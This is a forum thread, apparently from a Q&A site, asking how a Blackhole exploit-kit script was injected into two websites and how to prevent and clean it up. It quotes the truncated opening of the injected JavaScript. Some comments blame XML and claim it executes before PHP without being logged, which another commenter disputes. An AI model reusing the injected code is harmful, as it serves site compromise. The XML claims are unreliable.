# How did this malicious code get into a site?

Tags: malware, virus

This question was recently posed on another forum I am apart of.

Two sites that the person maintains had malicious code on the site the code is as follows:

```
<script>var date=new Date();function lols(){return true}
window.onerror=lols;function getXmlHttp(){var xmlhttp;try{xmlhttp=new
ActiveXObject('Msxml2.XMLHTTP');}catch(e){try{xmlhttp=new 
ActiveXObject('Microsoft.XMLHTTP');}catch(e){xmlhttp=false;}}
if(!xmlhttp&&typeof XMLHttpRequest!='undefined'){xmlhttp=new 
XMLHttpRequest();} return xmlhttp;}...(not pasting full code unless requested)
```

From what I can tell it is the Blackhole Exploit Script (Info [here](http://research.zscaler.com/2011/02/blackhole-exploits-kit-attack-growing.html) and [here](http://www.symantec.com/connect/blogs/blackhole-theory))

In your opinion what is the most likely way that the code was embedded onto the site? And what steps should be taken to 1) prevent future malicious code 2) to ensure that the computers are clean?

Comment: Voting to close. Very non-specific and really just asking for pure speculation. Prevention shouldn't require anything special. (Good passwords, don't install random WordPress themes if using WP, etc.)

Comment: you must be a hacker, @Su for closing down a good question.

Answer (score 1, accepted):

1) Strong passwords (12+ chars, letter+number+specials chars), use of trusted code, application of published security updates to managed code.

2) Virus/Malware scanning at least. If intrusion is suspected, change all your password (using the suggestions from #1 above) for the machine(s). If it's really a problem, hire a professional that specializes in computer security/forensics.

Not sure what else to tell you.

Comment: sounds like to me people need to exclude the XML language from webservers

Comment: @drtechno How do you figure that?

Comment: because xml is full of security holes, it should have never been used for web purposes. This is an XML black hole exploit btw. I do believe Microsoft is to blame because they tried to make the web use their proprietary language, that  at the end of the day causes web servers to be just as compromised as their home operating systems.

Comment: @drtechno This is a script injection exploit, not an exploit specific to XML. It's only related to XML by way of it leveraging the XMLHTTP object for making AJAX requests.

Comment: on the surface, yes @Justin Pearce. But it all depends on other things. Like cgi-bin install of php and its lack of controlling the execution order of XML. This forces the short tags to be enabled in php, and  with this, the client  can execute php with XML.

Comment: btw xml with cgi installed php is very common in the hosting world. If the xml executes before php that xml code request will never be logged (because it happened before the php)